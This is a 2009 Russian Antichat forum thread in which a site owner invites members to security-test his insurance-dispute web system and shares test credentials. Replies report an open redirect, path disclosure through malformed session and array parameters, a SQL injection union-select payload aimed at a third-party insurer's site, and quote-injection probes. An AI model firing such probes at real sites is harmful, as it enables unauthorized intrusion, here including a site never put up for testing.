Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.10.2009, 12:59
|
|
Новичок
Регистрация: 01.02.2009
Сообщений: 5
Провел на форуме:
4388
Репутация:
0
|
|
Проверьте сайт
Вообщем системка, для урегулирования страховых споров.
url: insurance-ombudsman-doc.kz
url для входа в систему: insurance-ombudsman-doc.kz/workspace
тестовые акки:
oksana@oksana.com - исполнитель
omb@omb.kz - омбудсман
www.allianz.kz - ск
пароль такой же как логин.
системка самописная + расширения:
HTML_QuickForm
Smarty
pchart
phpids
lime_survey
memcached
bbcode
Каков принцип работы:
чел заходит на сайт insurance-ombudsman-doc.kz
подает заявление
дело отправляется СК. При выборе СК в подаче заявления выбирайте всегда `Allianz Kazakhstan`
СК заходит в систему insurance-ombudsman-doc.kz/workspace, урегулирует или не урегулирует ситуацию. Отправляется уведомление или омбудсману или заявителю, зависит от того что сделала СК и т.д. По ходу дела все станет понятным надеюсь.
Огромное спс всем участвующим.
|
|
|
13.10.2009, 14:07
|
|
Познающий
Регистрация: 05.06.2009
Сообщений: 41
Провел на форуме:
258796
Репутация:
72
|
|
http://insurance-ombudsman-doc.kz/workspace?rederict[]=
Пути
----------------------------------
http://insurance-ombudsman-doc.kz/workspace?rederict=http://www.google.ru
можно сделать редирект на любой сайт при вводе логина и пароля.(зачем оно нужно?)
Последний раз редактировалось DFrost; 13.10.2009 в 14:27..
|
|
|
|
13.10.2009, 14:57
|
|
Участник форума
Регистрация: 02.06.2009
Сообщений: 143
Провел на форуме:
343507
Репутация:
114
|
|
Раскрытие путей.
Перехватываем пакет.
В значение сессии вставляем что-то типа !@#$%^&*([].
Отправляем и получаем ошибку.
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/.../www/.../config.php
Так же есть подозрение на еще одну уязвимость, но для того чтобы проверить это, мне понадобится твоя помощь. Если согласен помочь, то пиши в личку.
Последний раз редактировалось W@r.N0i$e; 13.10.2009 в 16:28..
|
|
|
|
14.10.2009, 07:15
|
|
Новичок
Регистрация: 01.02.2009
Сообщений: 5
Провел на форуме:
4388
Репутация:
0
|
|
можно сделать редирект на любой сайт при вводе логина и пароля.(зачем оно нужно?)
да действительно) зачем оно нужно? большое спс за то что порылись в системке. буду исправлять.
Так же есть подозрение на еще одну уязвимость, но для того чтобы проверить это, мне понадобится твоя помощь. Если согласен помочь, то пиши в личку.
Уже отписался в личку. Спс за найденный косяк.
|
|
|
|
14.10.2009, 11:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
SQL
http://www.allianz.kz/lang/ru/pages/-4+union+select+1,2,3,version(),5,6,7--
ps или я не тот url поверяю?  |
|
|
|
14.10.2009, 11:57
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Преобразуем имена переменных из самой первой формы в array, тобиж дописываем везде
name[]=
И получаем:
PHP код:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /path/*/Common.php on line 150
Последний раз редактировалось BlackSun; 13.11.2009 в 16:44..
|
|
|
|
14.10.2009, 11:59
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
PHP код:
http://insurance-ombudsman-doc.kz/workspace?rederict[]=/SESSION
|
|
|
|
14.10.2009, 12:02
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
PHP код:
http://insurance-ombudsman-doc.kz/workspace?rederict&
email[]=&password[]=&submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8 - POST
Опять же,это везде,банальное [] |
|
|
|
14.10.2009, 12:50
|
|
Новичок
Регистрация: 01.02.2009
Сообщений: 5
Провел на форуме:
4388
Репутация:
0
|
|
SQL
http://www.allianz.kz/lang/ru/pages/-4+union+select+1,2,3,version(),5,6,7--
ps или я не тот url поверяю?
к сожалению не тот.
PHP код:
http://insurance-ombudsman-doc.kz/workspace?rederict&
email[]=&password[]=&submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8 - POST
Опять же,это везде,банальное []
спс. оставил на заметку. будем исправлять.
|
|
|
|
14.10.2009, 15:22
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
http://insurance-ombudsman-doc.kz/getExecutorMenu.php
PHP код:
id=-12222
id[]=
id=1
id=15'
И в том-же духе.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
